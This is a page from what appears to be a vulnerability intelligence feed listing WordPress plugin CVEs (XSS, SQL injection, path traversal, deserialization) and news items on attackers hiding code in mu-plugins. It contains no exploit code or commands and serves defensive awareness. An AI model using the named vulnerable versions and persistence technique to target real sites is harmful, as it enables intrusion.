Threat and Vulnerability Intelligence Database

RSS Feed

Example Searches:

CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited

CVE-2025-2055
MapPress Maps for WordPress < 2.94.9 - Contributor+ Stored XSS
Description: The MapPress Maps for WordPress plugin before 2.94.9 does not sanitise and escape some parameters when outputing them in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks.

EPSS Score: 0.04%

Source: CVE
April 3rd, 2025 (16 days ago)

CVE-2025-2048
Lana Downloads Manager < 1.10.0 - Admin+ Arbitrary File Download via Path Traversal
Description: The Lana Downloads Manager WordPress plugin before 1.10.0 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks and download arbitrary files on the server

EPSS Score: 0.03%

Source: CVE
April 1st, 2025 (18 days ago)

CVE-2025-1986
Gutentor < 3.4.7 - Admin+ SQL Injection
Description: The Gutentor WordPress plugin before 3.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks

EPSS Score: 0.03%

Source: CVE
April 1st, 2025 (18 days ago)
WordPress plugin "Welcart e-Commerce" vulnerable to untrusted data deserialization
Description: WordPress plugin "Welcart e-Commerce" provided by Welcart Inc. contains an untrusted data deserialization vulnerability.
Source: Japan Vulnerability Notes (JVN)
April 1st, 2025 (18 days ago)
Hackers abuse WordPress MU-Plugins to hide malicious code
Description: Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. [...]
Source: BleepingComputer
March 31st, 2025 (19 days ago)
Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images
Description: Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the
Source: TheHackerNews
March 31st, 2025 (19 days ago)

CVE-2025-0613
Photo Gallery < 1.8.34 - Unauthenticated Stored XSS
Description: The Photo Gallery by 10Web WordPress plugin before 1.8.34 does not sanitised and escaped comment added on images by unauthenticated users, leading to an Unauthenticated Stored-XSS attack when comments are displayed

EPSS Score: 0.06%

Source: CVE
March 31st, 2025 (19 days ago)

CVE-2024-4061
Survey Maker < 4.2.9 - Admin+ Stored XSS via Plugin Settings
Description: The Survey Maker WordPress plugin before 4.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

EPSS Score: 0.05%

SSVC Exploitation: none

Source: CVE
March 29th, 2025 (21 days ago)

CVE-2024-3822
Base64 Encoder/Decoder <= 0.9.2 - Reflected XSS
Description: The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

EPSS Score: 0.64%

SSVC Exploitation: none

Source: CVE
March 29th, 2025 (21 days ago)

CVE-2024-3582
Ungallery <= 2.2.4 - Stored XSS via CSRF
Description: The UnGallery WordPress plugin through 2.2.4 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

EPSS Score: 0.03%

SSVC Exploitation: poc

Source: CVE
March 29th, 2025 (21 days ago)